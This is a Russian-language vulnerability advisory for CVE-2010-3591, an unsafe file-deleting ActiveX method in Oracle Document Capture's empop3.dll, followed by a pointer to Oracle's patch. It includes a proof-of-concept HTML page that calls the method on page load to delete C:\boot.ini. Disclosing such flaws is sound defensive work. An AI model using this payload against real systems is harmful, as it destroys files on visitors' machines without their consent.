CVE-2010-3591: Небезопасный метод
Вендор
Oracle
Продукт
Oracle Document Capture Release 10gR3
Тип уязвимости
Небезопасный метод
Reported
22.03.2010
Date of Public Advisory
24.01.2011
Подтверждение
Автор
Дмитрий Евдокимов
Детальное описание
Oracle Document Capture содержит компонент ActiveX EMPOP3Lib (empop3.dll) Lib GUID: {F647CBE5-3C01-402A-B3F0-502A77054A24} , который содержит небезопасный метод «DownloadSingleMessageToFile», способный удалить любой файл в системе.
Class EasyMailPop3
GUID: {F647CBE5-3C01-402A-B3F0-502A77054A24}
Number of Interfaces: 1
Default Interface: IPOP3Main
RegKey Safe for Script: False
RegkeySafe for Init: False
KillBitSet: False
Детали
Злоумышленник может создать HTML-страницу, которая вызовет уязвимую функцию «DownloadSingleMessageToFile» из ActiveX-компонента empop3.dll
Пример
<HTML>
<HEAD>
<TITLE>DSecRG</TITLE>
</HEAD>
<BODY>
<OBJECT id=’eds’ classid=’clsid:F647CBE5-3C01-402A-B3F0-502A77054A24′></OBJECT>
<SCRIPT>
function Exploit(){
eds.DownloadSingleMessageToFile(1,»C:\\boot.ini»,1);
}
Exploit();
</SCRIPT>
</BODY>
</HTML>
Решение
Информация была опубликована в CPU, Январь 2011.
Клиенты могут загрузить патчи CPU, следуя инструкциям по ссылке:
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html